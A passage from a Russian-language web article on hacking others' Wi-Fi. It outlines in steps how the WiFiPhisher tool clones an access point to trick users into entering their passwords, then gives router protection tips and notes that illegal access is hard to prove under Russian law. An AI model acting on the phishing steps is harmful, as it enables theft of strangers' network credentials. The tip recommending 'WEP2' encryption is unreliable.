Для получения секретных данных о сети Wi Fi взломщики часто прибегают к помощи утилиты WiFiPhisher .

В использовании WiFiPhisher просто, необходимо:

  • Делаем настройку HTTP , HTTPS .
  • Сканируем wlan0 и wlan1 , пока не подключится.
  • Выслеживание DHCP и вывод IP address .
  • Выбираем вайфай точку.
  • Делаем копию точки доступа, прописываем аналогичное название сети. Реальная точка доступа будет хуже работать, из-за этого пользователь подключится к вашему клону.
  • Браузер попросит пользователя ввести login, password. Таким образом секретные данные попадают в руки взломщика.

Необходимые меры, для защиты вашей сети WiFi

  1. Устанавливайте пароли со сложным сочетанием букв и цифр, число символов должно быть 8-12.
  2. Необходимо выключить WPS, потому, что эта функция сохраняет авторизованных пользователей и при повторном запросе она автоматически подключает их.
  3. Иногда необходимо менять на маршрутизаторе PIN и отклейте заводскую бирку, где прописан PIN.
  4. Не вводите PIN на непроверенных сайтах.
  5. При настройке роутера не используйте старые типы шифрования WEP и TKIP, используйте новые типы WEP2 или другие более продвинутые.
  6. Ограничьте максимальное количество подключаемых устройств. К примеру, у вас в доме есть ноутбук и планшет, значит ограничьте до 2 устройств. После этого больше двух не подключится.
  7. Спрячьте свою сеть. Поставьте галочку в графе « Скрыть SSID ».
  8. Не забывайте периодически обновлять прошивку на роутере.

Ответственность за взлом

Есть две статьи УК РФ, которые можно применить к неправомерному доступу в сеть. Это статьи 272 и 273. Кому интересно можете почитать их в интернете. Казус в статье 272 заключается в то, что очень сложно доказать, что это именно вы взломали доступ. А вот если при взломе вы пользовались вредоносной программой (вирус), то можно применить и статью 273 УК РФ.


Заключение

Как можно взломать пароль на вай фай мы рассказали, дальше решение за вами, взламывать или не взламывать этот вопрос будет на вашей совести. Если у вас есть достаточно средств то, конечно же, нужно просто не забывать вовремя, пополнять свой интернет. И тогда вопрос о том, как можно взломать чужой wi fi сам собой отпадет. Ну и конечно не стоит списывать со счетов фактор азарта, когда хочется иногда проявить себя хотя бы в чем-то.

Ссылка на основную публикацию
Статьи c упоминанием слов:
Adblock
detector